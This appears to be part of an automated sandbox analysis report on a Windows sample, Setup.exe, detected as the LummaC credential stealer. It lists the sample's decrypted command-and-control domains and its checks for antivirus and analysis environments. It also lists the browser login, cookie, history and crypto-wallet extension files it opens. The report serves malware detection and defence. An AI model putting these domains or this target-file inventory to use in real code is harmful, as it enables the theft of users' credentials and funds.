Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Setup.exe, 00000000.00000003.1888928350.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001137000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001137000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001137000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C002D5 mov edx, dword ptr fs:[00000030h]	0_2_02C002D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C00895 mov eax, dword ptr fs:[00000030h]	0_2_02C00895
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C00EE4 mov eax, dword ptr fs:[00000030h]	0_2_02C00EE4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C00EE5 mov eax, dword ptr fs:[00000030h]	0_2_02C00EE5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02C00C45 mov eax, dword ptr fs:[00000030h]	0_2_02C00C45

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Setup.exe	String found in binary or memory: crosshuaht.lat
Source: Setup.exe	String found in binary or memory: rapeflowwj.lat
Source: Setup.exe	String found in binary or memory: aspecteirs.lat
Source: Setup.exe	String found in binary or memory: sustainskelet.lat
Source: Setup.exe	String found in binary or memory: simplerapplau.click
Source: Setup.exe	String found in binary or memory: necklacebudi.lat
Source: Setup.exe	String found in binary or memory: energyaffai.lat
Source: Setup.exe	String found in binary or memory: grannyejh.lat
Source: Setup.exe	String found in binary or memory: discokeyus.lat

Source: C:\Users\user\Desktop\Setup.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Setup.exe, 00000000.00000003.1827196762.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892199382.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets",
Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets",
Source: Setup.exe, 00000000.00000002.1892093250.0000000001190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Setup.exe, 00000000.00000003.1703033346.0000000001154000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Setup.exe, 00000000.00000002.1892093250.0000000001190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Setup.exe, 00000000.00000003.1765557136.000000000118C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Setup.exe, 00000000.00000003.1703033346.0000000001154000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveU\|I

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
